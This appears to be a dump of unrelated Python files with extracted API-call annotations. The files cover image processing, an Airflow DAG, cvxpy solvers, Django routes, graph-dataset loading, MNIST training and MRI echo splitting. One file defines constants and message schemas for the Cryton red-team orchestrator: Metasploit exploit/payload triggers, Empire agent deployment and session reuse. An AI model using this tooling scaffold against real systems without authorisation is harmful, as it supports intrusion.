cv2\n'), ((2856, 2909), 'cv2.convertScaleAbs', 'cv2.convertScaleAbs', (['self.img'], {'alpha': 'alpha', 'beta': 'beta'}), '(self.img, alpha=alpha, beta=beta)\n', (2875, 2909), False, 'import cv2\n'), ((3076, 3094), 'cv2.split', 'cv2.split', (['img_hsv'], {}), '(img_hsv)\n', (3085, 3094), False, 'import cv2\n'), ((3128, 3146), 'numpy.clip', 'np.clip', (['s', '(0)', '(255)'], {}), '(s, 0, 255)\n', (3135, 3146), True, 'import numpy as np\n'), ((3166, 3186), 'cv2.merge', 'cv2.merge', (['[h, s, v]'], {}), '([h, s, v])\n', (3175, 3186), False, 'import cv2\n'), ((3497, 3529), 'numpy.array', 'np.array', (['[color[0] - 15, 0, 20]'], {}), '([color[0] - 15, 0, 20])\n', (3505, 3529), True, 'import numpy as np\n'), ((3546, 3581), 'numpy.array', 'np.array', (['[color[0] + 15, 255, 255]'], {}), '([color[0] + 15, 255, 255])\n', (3554, 3581), True, 'import numpy as np\n'), ((3598, 3629), 'cv2.inRange', 'cv2.inRange', (['img_hsv', 'low', 'high'], {}), '(img_hsv, low, high)\n', (3609, 3629), False, 'import 
cv2\n'), ((4186, 4217), 'scipy.ndimage.rotate', 'ndimage.rotate', (['self.img', 'angle'], {}), '(self.img, angle)\n', (4200, 4217), False, 'from scipy import ndimage\n'), ((4237, 4256), 'math.radians', 'math.radians', (['angle'], {}), '(angle)\n', (4249, 4256), False, 'import math\n'), ((5311, 5373), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""data/haarcascade_frontalface_alt2.xml"""'], {}), "('data/haarcascade_frontalface_alt2.xml')\n", (5332, 5373), False, 'import cv2\n'), ((5477, 5519), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2GRAY'], {}), '(self.img, cv2.COLOR_BGR2GRAY)\n', (5489, 5519), False, 'import cv2\n'), ((5747, 5794), 'cv2.resize', 'cv2.resize', (['self.img', '(width // 2, height // 2)'], {}), '(self.img, (width // 2, height // 2))\n', (5757, 5794), False, 'import cv2\n'), ((5812, 5846), 'numpy.zeros', 'np.zeros', (['self.img.shape', 'np.uint8'], {}), '(self.img.shape, np.uint8)\n', (5820, 5846), True, 'import numpy as np\n'), ((6947, 6974), 'cv2.imwrite', 'cv2.imwrite', (['file', 'self.img'], {}), '(file, self.img)\n', (6958, 6974), False, 'import cv2\n'), ((7091, 7114), 'copy.deepcopy', 'deepcopy', (['self.img_copy'], {}), '(self.img_copy)\n', (7099, 7114), False, 'from copy import deepcopy\n'), ((7299, 7328), 'copy.deepcopy', 'deepcopy', (['self.grand_img_copy'], {}), '(self.grand_img_copy)\n', (7307, 7328), False, 'from copy import deepcopy\n'), ((7354, 7383), 'copy.deepcopy', 'deepcopy', (['self.grand_img_copy'], {}), '(self.grand_img_copy)\n', (7362, 7383), False, 'from copy import deepcopy\n'), ((2114, 2143), 'cv2.Canny', 'cv2.Canny', (['self.img', '(100)', '(200)'], {}), '(self.img, 100, 200)\n', (2123, 2143), False, 'import cv2\n'), ((2509, 2547), 'cv2.bitwise_and', 'cv2.bitwise_and', (['dst', 'dst'], {'mask': 'edges1'}), '(dst, dst, mask=edges1)\n', (2524, 2547), False, 'import cv2\n'), ((2614, 2652), 'cv2.bitwise_and', 'cv2.bitwise_and', (['dst', 'dst'], {'mask': 'edges2'}), '(dst, dst, mask=edges2)\n', (2629, 2652), False, 'import cv2\n'), ((3995, 4039), 'cv2.resize', 'cv2.resize', (['self.img', '(0, 0)'], {'fx': '(0.5)', 'fy': '(0.5)'}), '(self.img, (0, 0), fx=0.5, fy=0.5)\n', (4005, 4039), False, 'import cv2\n'), ((4587, 4609), 'math.atan2', 'math.atan2', (['bb_w', 'bb_w'], {}), '(bb_w, bb_w)\n', (4597, 4609), False, 'import math\n'), ((4626, 4648), 'math.atan2', 'math.atan2', (['bb_w', 'bb_w'], {}), '(bb_w, bb_w)\n', (4636, 4648), False, 'import math\n'), ((4750, 4765), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (4758, 4765), False, 'import math\n'), ((4801, 4816), 'math.sin', 'math.sin', (['delta'], {}), '(delta)\n', (4809, 4816), False, 'import math\n'), ((4834, 4849), 'math.cos', 'math.cos', (['gamma'], {}), '(gamma)\n', (4842, 4849), False, 'import math\n'), ((4867, 4882), 'math.tan', 'math.tan', (['gamma'], {}), '(gamma)\n', (4875, 4882), False, 'import math\n'), ((5911, 5954), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (5921, 5954), False, 'import cv2\n'), ((6063, 6106), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6073, 6106), False, 'import cv2\n'), ((7160, 7181), 'cv2.flip', 'cv2.flip', (['self.img', '(0)'], {}), '(self.img, 0)\n', (7168, 7181), False, 'import cv2\n'), ((7227, 7248), 'cv2.flip', 'cv2.flip', (['self.img', '(1)'], {}), '(self.img, 1)\n', (7235, 7248), False, 'import cv2\n'), ((2995, 3036), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2HSV'], {}), 
'(self.img, cv2.COLOR_BGR2HSV)\n', (3007, 3036), False, 'import cv2\n'), ((3422, 3463), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2HSV'], {}), '(self.img, cv2.COLOR_BGR2HSV)\n', (3434, 3463), False, 'import cv2\n'), ((4281, 4314), 'math.floor', 'math.floor', (['(angle / (math.pi / 2))'], {}), '(angle / (math.pi / 2))\n', (4291, 4314), False, 'import math\n'), ((4474, 4489), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (4482, 4489), False, 'import math\n'), ((4496, 4511), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (4504, 4511), False, 'import math\n'), ((4532, 4547), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (4540, 4547), False, 'import math\n'), ((4554, 4569), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (4562, 4569), False, 'import math\n'), ((4783, 4798), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (4791, 4798), False, 'import math\n'), ((4951, 4980), 'numpy.array', 'np.array', (['self.img.shape[:-1]'], {}), '(self.img.shape[:-1])\n', (4959, 4980), True, 'import numpy as np\n'), ((6254, 6297), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6264, 6297), False, 'import cv2\n'), ((6422, 6465), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6432, 6465), False, 'import cv2\n'), ((6603, 6646), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6613, 6646), False, 'import cv2\n'), ((6767, 6810), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6777, 6810), False, 'import cv2\n')]
|
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.bash_operator import BashOperator
from airflow.sensors.external_task_sensor import ExternalTaskSensor
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime(2020, 6, 7),
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=1)
}
dag = DAG(
'dependent-dag',
default_args=default_args,
schedule_interval='*/5 * * * *',
catchup=False,
)
start = ExternalTaskSensor(
task_id='start-task',
external_dag_id='example-dag',
external_task_id='python-print',
execution_delta=timedelta(minutes=5),
timeout=3*60,
dag=dag,
)
curl = BashOperator(
bash_command=r"""curl -H "Content-Type: application/json" -d '{"status":"dependency successful", "time":"{{ ts }}"}' mock-server.default.svc.cluster.local""",
task_id="curl-task",
dag=dag,
)
curl.set_upstream(start)
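# Note (illustrative, not part of the original file): the dependency above could
# equivalently be written with Airflow's bitshift syntax:
#
#   start >> curl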
|
[
"airflow.operators.bash_operator.BashOperator",
"datetime.timedelta",
"airflow.DAG",
"datetime.datetime"
] |
[((430, 530), 'airflow.DAG', 'DAG', (['"""dependent-dag"""'], {'default_args': 'default_args', 'schedule_interval': '"""*/5 * * * *"""', 'catchup': '(False)'}), "('dependent-dag', default_args=default_args, schedule_interval=\n '*/5 * * * *', catchup=False)\n", (433, 530), False, 'from airflow import DAG\n'), ((755, 963), 'airflow.operators.bash_operator.BashOperator', 'BashOperator', ([], {'bash_command': '"""curl -H "Content-Type: application/json" -d \'{"status":"dependency successful", "time":"{{ ts }}"}\' mock-server.default.svc.cluster.local"""', 'task_id': '"""curl-task"""', 'dag': 'dag'}), '(bash_command=\n \'curl -H "Content-Type: application/json" -d \\\'{"status":"dependency successful", "time":"{{ ts }}"}\\\' mock-server.default.svc.cluster.local\'\n , task_id=\'curl-task\', dag=dag)\n', (767, 963), False, 'from airflow.operators.bash_operator import BashOperator\n'), ((281, 301), 'datetime.datetime', 'datetime', (['(2020)', '(6)', '(7)'], {}), '(2020, 6, 7)\n', (289, 301), False, 'from datetime import datetime, timedelta\n'), ((400, 420), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(1)'}), '(minutes=1)\n', (409, 420), False, 'from datetime import datetime, timedelta\n'), ((692, 712), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (701, 712), False, 'from datetime import datetime, timedelta\n')]
|
"""
Minimizes D(b, Ax) for x ∈ ℝ₊^N where aₙ, b ∈ ℝ₊^M and D is a divergence.
These occur as ingredients of algorithms for the sparse case.
"""
import cvxpy
import numpy
def euclidean(A, b):
return _solve_convex(A, b, lambda p, q: cvxpy.norm2(p - q))
def total_variation(A, b):
return _solve_convex(A, b, lambda p, q: 0.5 * cvxpy.norm1(p - q))
def _solve_convex(A, b, D):
x = cvxpy.Variable(A.shape[1])
objective = cvxpy.Minimize(D(b, A @ x))
constraints = [x >= 0]
problem = cvxpy.Problem(objective, constraints)
problem.solve()
status = problem.status
assert status == cvxpy.OPTIMAL, f"Unable to solve optimization problem: {status}"
x = x.value
x[numpy.isclose(x, 0)] = 0
return x
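# Minimal usage sketch (illustrative only, not part of the original module): the
# matrix and vector below are made-up values chosen to satisfy the nonnegativity
# assumptions stated in the docstring.
#
#   A = numpy.array([[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]])
#   b = numpy.array([1.0, 2.0, 2.5])
#   x_l2 = euclidean(A, b)        # minimizes ||b - A x||_2 over x >= 0
#   x_tv = total_variation(A, b)  # minimizes 0.5 * ||b - A x||_1 over x >= 0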
|
[
"cvxpy.norm1",
"numpy.isclose",
"cvxpy.Problem",
"cvxpy.Variable",
"cvxpy.norm2"
] |
[((397, 423), 'cvxpy.Variable', 'cvxpy.Variable', (['A.shape[1]'], {}), '(A.shape[1])\n', (411, 423), False, 'import cvxpy\n'), ((509, 546), 'cvxpy.Problem', 'cvxpy.Problem', (['objective', 'constraints'], {}), '(objective, constraints)\n', (522, 546), False, 'import cvxpy\n'), ((706, 725), 'numpy.isclose', 'numpy.isclose', (['x', '(0)'], {}), '(x, 0)\n', (719, 725), False, 'import numpy\n'), ((240, 258), 'cvxpy.norm2', 'cvxpy.norm2', (['(p - q)'], {}), '(p - q)\n', (251, 258), False, 'import cvxpy\n'), ((339, 357), 'cvxpy.norm1', 'cvxpy.norm1', (['(p - q)'], {}), '(p - q)\n', (350, 357), False, 'import cvxpy\n')]
|
from django.urls import path
from api.authentication import CustomAuthToken
from api.views import (
ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView,
RegisterUserView, TransactionList)
urlpatterns = [
# Register
path('user/register/', RegisterUserView.as_view(), name="register-user"),
path('user/view-token/', CustomAuthToken.as_view(), name='token-view'),
# Transaction List
path('transactions/', TransactionList.as_view(), name='transaction-list'),
# API Key
path('user/apikeys/', ApiKeyView.as_view(), name='apikeys'),
path('user/apikeys/<int:key_id>/',
ApiKeyDetail.as_view(), name='apikey-detail'),
# Payment
path('payment/', PaymentView.as_view(), name='payment'),
path('payment/confirm/', PaymentConfirmationView.as_view(),
name='payment-confirm'),
]
|
[
"api.views.PaymentConfirmationView.as_view",
"api.views.RegisterUserView.as_view",
"api.authentication.CustomAuthToken.as_view",
"api.views.ApiKeyDetail.as_view",
"api.views.TransactionList.as_view",
"api.views.ApiKeyView.as_view",
"api.views.PaymentView.as_view"
] |
[((268, 294), 'api.views.RegisterUserView.as_view', 'RegisterUserView.as_view', ([], {}), '()\n', (292, 294), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((348, 373), 'api.authentication.CustomAuthToken.as_view', 'CustomAuthToken.as_view', ([], {}), '()\n', (371, 373), False, 'from api.authentication import CustomAuthToken\n'), ((445, 470), 'api.views.TransactionList.as_view', 'TransactionList.as_view', ([], {}), '()\n', (468, 470), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((539, 559), 'api.views.ApiKeyView.as_view', 'ApiKeyView.as_view', ([], {}), '()\n', (557, 559), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((626, 648), 'api.views.ApiKeyDetail.as_view', 'ApiKeyDetail.as_view', ([], {}), '()\n', (646, 648), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((709, 730), 'api.views.PaymentView.as_view', 'PaymentView.as_view', ([], {}), '()\n', (728, 730), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n'), ((778, 811), 'api.views.PaymentConfirmationView.as_view', 'PaymentConfirmationView.as_view', ([], {}), '()\n', (809, 811), False, 'from api.views import ApiKeyDetail, ApiKeyView, PaymentConfirmationView, PaymentView, RegisterUserView, TransactionList\n')]
|
from datetime import datetime
from schema import Optional, Or
# Main queue constants
ACTION = "action"
CORRELATION_ID = "correlation_id"
DATA = "data"
RESULT_PIPE = "result_pipe"
QUEUE_NAME = "queue_name"
PROPERTIES = "properties"
HIGH_PRIORITY = 0
MEDIUM_PRIORITY = 1
LOW_PRIORITY = 2
# Processor action types
ACTION_KILL_TASK = "_kill_task"
ACTION_FINISH_TASK = "_finish_task"
ACTION_START_TRIGGER = "_start_trigger"
ACTION_STOP_TRIGGER = "_stop_trigger"
ACTION_LIST_TRIGGERS = "_list_triggers"
ACTION_SEND_MESSAGE = "_send_message"
ACTION_SHUTDOWN_THREADED_PROCESSOR = "shutdown_threaded_processor"
# Event types
EVENT_VALIDATE_MODULE = "VALIDATE_MODULE"
EVENT_LIST_MODULES = "LIST_MODULES"
EVENT_LIST_SESSIONS = "LIST_SESSIONS"
EVENT_KILL_STEP_EXECUTION = "KILL_STEP_EXECUTION"
EVENT_HEALTH_CHECK = "HEALTH_CHECK"
EVENT_START_TRIGGER = "START_TRIGGER"
EVENT_STOP_TRIGGER = "STOP_TRIGGER"
EVENT_TRIGGER_STAGE = "TRIGGER_STAGE"
EVENT_LIST_TRIGGERS = "LIST_TRIGGERS"
# Trigger types
HTTP = "HTTP"
MSF = "MSF"
# Trigger constants
TRIGGER_HOST = "host"
TRIGGER_PORT = "port"
TRIGGER_TYPE = "trigger_type"
TRIGGER_STAGE_EXECUTION_ID = "stage_execution_id"
TRIGGER_PARAMETERS = "parameters"
TRIGGER_ID = "trigger_id"
EXPLOIT = "exploit"
PAYLOAD = "payload"
EXPLOIT_ARGUMENTS = "exploit_arguments"
PAYLOAD_ARGUMENTS = "payload_arguments"
# Step types
STEP_TYPE = "step_type"
STEP_TYPE_EXECUTE_ON_WORKER = 'cryton/execute-on-worker'
STEP_TYPE_DEPLOY_AGENT = 'empire/deploy-agent'
STEP_TYPE_EXECUTE_ON_AGENT = 'empire/execute-on-agent'
# RabbitMQ message keywords
EVENT_T = "event_t"
EVENT_V = "event_v"
ARGUMENTS = "arguments"
DEFAULT_MSG_PROPERTIES = {"content_encoding": "utf-8", 'timestamp': datetime.now()}
TARGET_IP = "target_ip"
SESSION_LIST = "session_list"
MODULE_LIST = "module_list"
TRIGGER_LIST = "trigger_list"
ACK_QUEUE = "ack_queue"
# Step type execute-on-worker arguments keywords
ATTACK_MODULE = "attack_module"
ATTACK_MODULE_ARGUMENTS = "attack_module_args"
# Step type execute-on-agent arguments keywords
USE_AGENT = "use_agent"
EMPIRE_MODULE = "empire_module"
EMPIRE_MODULE_ARGUMENTS = "empire_module_args"
EMPIRE_SHELL_COMMAND = "shell_command"
# Step type deploy-agent arguments keywords
STAGER_ARGUMENTS = "stager_arguments"
STAGER_ARGS_STAGER_TYPE = "stager_type"
STAGER_ARGS_TARGET_OS_TYPE = "os_type"
STAGER_ARGS_LISTENER_TYPE = "listener_type"
STAGER_ARGS_LISTENER_NAME = "listener_name"
STAGER_ARGS_LISTENER_PORT = "listener_port"
STAGER_ARGS_AGENT_NAME = "agent_name"
STAGER_ARGS_STAGER_OPTIONS = "stager_options"
STAGER_ARGS_LISTENER_OPTIONS = "listener_options"
# Session system keywords
SESSION_ID = 'session_id'
CREATE_NAMED_SESSION = 'create_named_session'
USE_NAMED_SESSION = 'use_named_session'
USE_ANY_SESSION_TO_TARGET = 'use_any_session_to_target'
SSH_CONNECTION = 'ssh_connection'
# Other constants
RETURN_CODE = "return_code"
STD_ERR = "std_err"
STD_OUT = "std_out"
CODE_ERROR = -2
CODE_OK = 0
CODE_KILL = -3
FILE = "file"
FILE_CONTENT = "file_content"
FILE_ENCODING = "file_encoding"
BASE64 = "base64"
UTF8 = "utf8"
REPLY_TO = "reply_to"
# ControlTask validation schemas
EVENT_VALIDATE_MODULE_SCHEMA = {ATTACK_MODULE: str, ATTACK_MODULE_ARGUMENTS: dict}
EVENT_LIST_MODULES_SCHEMA = dict
EVENT_LIST_SESSIONS_SCHEMA = {Optional(Or("type", "tunnel_local", "tunnel_peer", "via_exploit", "via_payload", "desc",
"info", "workspace", "session_host", "session_port", "target_host",
"username", "uuid", "exploit_uuid", "routes", "arch")): Or(str, int)}
EVENT_KILL_STEP_EXECUTION_SCHEMA = {"correlation_id": str}
EVENT_HEALTH_CHECK_SCHEMA = {}
EVENT_START_TRIGGER_HTTP_SCHEMA = {"host": str, "port": int, "trigger_type": "HTTP", "reply_to": str, "routes": [
{"path": str, "method": str, "parameters": [{"name": str, "value": str}]}]}
EVENT_START_TRIGGER_MSF_SCHEMA = {"host": str, "port": int, "exploit": str,
Optional("exploit_arguments"): {Optional(str): Or(str, int)},
"payload": str, Optional("payload_arguments"): {Optional(str): Or(str, int)},
"trigger_type": "MSF", "reply_to": str}
EVENT_STOP_TRIGGER_SCHEMA = {"trigger_id": str}
EVENT_LIST_TRIGGERS_SCHEMA = {}
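# Usage sketch (illustrative only): the validation schemas above are plain dicts
# consumed by the `schema` package (already imported above), so a message can be
# checked roughly like this (the payload value is made up):
#
#   from schema import Schema
#   Schema(EVENT_KILL_STEP_EXECUTION_SCHEMA).validate({"correlation_id": "abc-123"})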
|
[
"schema.Optional",
"datetime.datetime.now",
"schema.Or"
] |
[((1698, 1712), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1710, 1712), False, 'from datetime import datetime\n'), ((3564, 3576), 'schema.Or', 'Or', (['str', 'int'], {}), '(str, int)\n', (3566, 3576), False, 'from schema import Optional, Or\n'), ((3972, 4001), 'schema.Optional', 'Optional', (['"""exploit_arguments"""'], {}), "('exploit_arguments')\n", (3980, 4001), False, 'from schema import Optional, Or\n'), ((4084, 4113), 'schema.Optional', 'Optional', (['"""payload_arguments"""'], {}), "('payload_arguments')\n", (4092, 4113), False, 'from schema import Optional, Or\n'), ((3276, 3485), 'schema.Or', 'Or', (['"""type"""', '"""tunnel_local"""', '"""tunnel_peer"""', '"""via_exploit"""', '"""via_payload"""', '"""desc"""', '"""info"""', '"""workspace"""', '"""session_host"""', '"""session_port"""', '"""target_host"""', '"""username"""', '"""uuid"""', '"""exploit_uuid"""', '"""routes"""', '"""arch"""'], {}), "('type', 'tunnel_local', 'tunnel_peer', 'via_exploit', 'via_payload',\n 'desc', 'info', 'workspace', 'session_host', 'session_port',\n 'target_host', 'username', 'uuid', 'exploit_uuid', 'routes', 'arch')\n", (3278, 3485), False, 'from schema import Optional, Or\n'), ((4004, 4017), 'schema.Optional', 'Optional', (['str'], {}), '(str)\n', (4012, 4017), False, 'from schema import Optional, Or\n'), ((4019, 4031), 'schema.Or', 'Or', (['str', 'int'], {}), '(str, int)\n', (4021, 4031), False, 'from schema import Optional, Or\n'), ((4116, 4129), 'schema.Optional', 'Optional', (['str'], {}), '(str)\n', (4124, 4129), False, 'from schema import Optional, Or\n'), ((4131, 4143), 'schema.Or', 'Or', (['str', 'int'], {}), '(str, int)\n', (4133, 4143), False, 'from schema import Optional, Or\n')]
|
import os.path as osp
import pickle as pkl
import torch
import random
import numpy as np
from torch_geometric.data import InMemoryDataset, Data
class SPMotif(InMemoryDataset):
splits = ['train', 'val', 'test']
def __init__(self, root, mode='train', transform=None, pre_transform=None, pre_filter=None):
assert mode in self.splits
self.mode = mode
super(SPMotif, self).__init__(root, transform, pre_transform, pre_filter)
idx = self.processed_file_names.index('SPMotif_{}.pt'.format(mode))
self.data, self.slices = torch.load(self.processed_paths[idx])
@property
def raw_file_names(self):
return ['train.npy', 'val.npy', 'test.npy']
@property
def processed_file_names(self):
return ['SPMotif_train.pt', 'SPMotif_val.pt', 'SPMotif_test.pt']
def download(self):
if not osp.exists(osp.join(self.raw_dir, 'raw', 'SPMotif_train.npy')):
print("raw data of `SPMotif` doesn't exist, please redownload from our github.")
raise FileNotFoundError
def process(self):
idx = self.raw_file_names.index('{}.npy'.format(self.mode))
edge_index_list, label_list, ground_truth_list, role_id_list, pos = np.load(osp.join(self.raw_dir, self.raw_file_names[idx]), allow_pickle=True)
data_list = []
for idx, (edge_index, y, ground_truth, z, p) in enumerate(zip(edge_index_list, label_list, ground_truth_list, role_id_list, pos)):
edge_index = torch.from_numpy(edge_index)
edge_index = torch.tensor(edge_index, dtype=torch.long)
node_idx = torch.unique(edge_index)
assert node_idx.max() == node_idx.size(0) - 1
x = torch.zeros(node_idx.size(0), 4)
index = [i for i in range(node_idx.size(0))]
x[index, z] = 1
x = torch.rand((node_idx.size(0), 4))
edge_attr = torch.ones(edge_index.size(1), 1)
y = torch.tensor(y, dtype=torch.long).unsqueeze(dim=0)
data = Data(x=x, y=y, z=z,
edge_index=edge_index,
edge_attr=edge_attr,
pos=p,
edge_gt_att=torch.LongTensor(ground_truth),
name=f'SPMotif-{self.mode}-{idx}', idx=idx)
if self.pre_filter is not None and not self.pre_filter(data):
continue
if self.pre_transform is not None:
data = self.pre_transform(data)
data_list.append(data)
idx = self.processed_file_names.index('SPMotif_{}.pt'.format(self.mode))
print(self.processed_paths[idx])
print(len(data_list))
torch.save(self.collate(data_list), self.processed_paths[idx])
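# Usage sketch (illustrative only, not part of the original file): the root path
# below is hypothetical; the raw .npy splits must already be present (see download()).
#
#   train_set = SPMotif(root='data/SPMotif', mode='train')
#   print(len(train_set), train_set[0])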
|
[
"torch.unique",
"torch.LongTensor",
"torch.load",
"os.path.join",
"torch.tensor",
"torch.from_numpy"
] |
[((568, 605), 'torch.load', 'torch.load', (['self.processed_paths[idx]'], {}), '(self.processed_paths[idx])\n', (578, 605), False, 'import torch\n'), ((1245, 1293), 'os.path.join', 'osp.join', (['self.raw_dir', 'self.raw_file_names[idx]'], {}), '(self.raw_dir, self.raw_file_names[idx])\n', (1253, 1293), True, 'import os.path as osp\n'), ((1501, 1529), 'torch.from_numpy', 'torch.from_numpy', (['edge_index'], {}), '(edge_index)\n', (1517, 1529), False, 'import torch\n'), ((1555, 1597), 'torch.tensor', 'torch.tensor', (['edge_index'], {'dtype': 'torch.long'}), '(edge_index, dtype=torch.long)\n', (1567, 1597), False, 'import torch\n'), ((1621, 1645), 'torch.unique', 'torch.unique', (['edge_index'], {}), '(edge_index)\n', (1633, 1645), False, 'import torch\n'), ((878, 928), 'os.path.join', 'osp.join', (['self.raw_dir', '"""raw"""', '"""SPMotif_train.npy"""'], {}), "(self.raw_dir, 'raw', 'SPMotif_train.npy')\n", (886, 928), True, 'import os.path as osp\n'), ((1962, 1995), 'torch.tensor', 'torch.tensor', (['y'], {'dtype': 'torch.long'}), '(y, dtype=torch.long)\n', (1974, 1995), False, 'import torch\n'), ((2211, 2241), 'torch.LongTensor', 'torch.LongTensor', (['ground_truth'], {}), '(ground_truth)\n', (2227, 2241), False, 'import torch\n')]
|
import logging
import hydra
import torch
from model import MyAwesomeModel
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from torch.utils.data import DataLoader
from src.data.mnist import CorruptedMNIST
log = logging.getLogger(__name__)
@hydra.main(config_path="configs", config_name="mnist_config.yaml")
def train(cfg):
print("Training day and night")
model = MyAwesomeModel(cfg.model)
train_loader = DataLoader(
CorruptedMNIST(cfg.training.train_set), batch_size=cfg.training.batch_size
)
validation_loader = DataLoader(
CorruptedMNIST(cfg.training.valid_set), batch_size=cfg.training.batch_size
)
early_stopping_callback = EarlyStopping(
monitor="valid_loss", patience=3, verbose=True, mode="min"
)
trainer = Trainer(
max_epochs=cfg.training.epochs,
accelerator="gpu",
gpus=1,
limit_train_batches=cfg.training.limit_train_batches,
callbacks=[early_stopping_callback],
)
trainer.fit(
model, train_dataloaders=train_loader, val_dataloaders=validation_loader
)
# Save model
torch.save(model.state_dict(), cfg.training.model_path)
script_model = torch.jit.script(model)
script_model.save('deployable_model.pt')
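# Usage sketch (illustrative only): the exported TorchScript module can later be
# restored without the Python class definition, e.g.
#
#   model = torch.jit.load('deployable_model.pt')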
train()
|
[
"pytorch_lightning.Trainer",
"model.MyAwesomeModel",
"torch.jit.script",
"src.data.mnist.CorruptedMNIST",
"hydra.main",
"pytorch_lightning.callbacks.early_stopping.EarlyStopping",
"logging.getLogger"
] |
[((283, 310), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (300, 310), False, 'import logging\n'), ((317, 383), 'hydra.main', 'hydra.main', ([], {'config_path': '"""configs"""', 'config_name': '"""mnist_config.yaml"""'}), "(config_path='configs', config_name='mnist_config.yaml')\n", (327, 383), False, 'import hydra\n'), ((451, 476), 'model.MyAwesomeModel', 'MyAwesomeModel', (['cfg.model'], {}), '(cfg.model)\n', (465, 476), False, 'from model import MyAwesomeModel\n'), ((763, 836), 'pytorch_lightning.callbacks.early_stopping.EarlyStopping', 'EarlyStopping', ([], {'monitor': '"""valid_loss"""', 'patience': '(3)', 'verbose': '(True)', 'mode': '"""min"""'}), "(monitor='valid_loss', patience=3, verbose=True, mode='min')\n", (776, 836), False, 'from pytorch_lightning.callbacks.early_stopping import EarlyStopping\n'), ((868, 1034), 'pytorch_lightning.Trainer', 'Trainer', ([], {'max_epochs': 'cfg.training.epochs', 'accelerator': '"""gpu"""', 'gpus': '(1)', 'limit_train_batches': 'cfg.training.limit_train_batches', 'callbacks': '[early_stopping_callback]'}), "(max_epochs=cfg.training.epochs, accelerator='gpu', gpus=1,\n limit_train_batches=cfg.training.limit_train_batches, callbacks=[\n early_stopping_callback])\n", (875, 1034), False, 'from pytorch_lightning import Trainer\n'), ((1289, 1312), 'torch.jit.script', 'torch.jit.script', (['model'], {}), '(model)\n', (1305, 1312), False, 'import torch\n'), ((520, 558), 'src.data.mnist.CorruptedMNIST', 'CorruptedMNIST', (['cfg.training.train_set'], {}), '(cfg.training.train_set)\n', (534, 558), False, 'from src.data.mnist import CorruptedMNIST\n'), ((648, 686), 'src.data.mnist.CorruptedMNIST', 'CorruptedMNIST', (['cfg.training.valid_set'], {}), '(cfg.training.valid_set)\n', (662, 686), False, 'from src.data.mnist import CorruptedMNIST\n')]
|
"""Split each echo to prepare for registration."""
import os
import subprocess
import numpy as np
import nibabel as nb
# =============================================================================
NII_NAMES = [
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-01_dir-AP_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-02_dir-RL_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-03_dir-PA_part-mag_MEGRE_crop.nii.gz',
'/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/01_crop/sub-23_ses-T2s_run-04_dir-LR_part-mag_MEGRE_crop.nii.gz',
]
OUTDIR = "/home/faruk/data/DATA_MRI_NIFTI/derived/sub-23/T2s/05_split_echoes"
# =============================================================================
print("Step_05: Split echoes.")
# Output directory
if not os.path.exists(OUTDIR):
os.makedirs(OUTDIR)
print(" Output directory: {}".format(OUTDIR))
# Average across echoes
for i, nii_name in enumerate(NII_NAMES):
# Load data
nii = nb.load(nii_name)
temp = np.squeeze(np.asanyarray(nii.dataobj))
# Save each echo separately
basename, ext = nii.get_filename().split(os.extsep, 1)
basename = os.path.basename(basename)
out_name = os.path.join(OUTDIR, basename)
for j in range(temp.shape[-1]):
echo = np.squeeze(temp[..., j])
img = nb.Nifti1Image(echo, affine=nii.affine, header=nii.header)
nb.save(img, '{}_echo{}.nii.gz'.format(out_name, j+1))
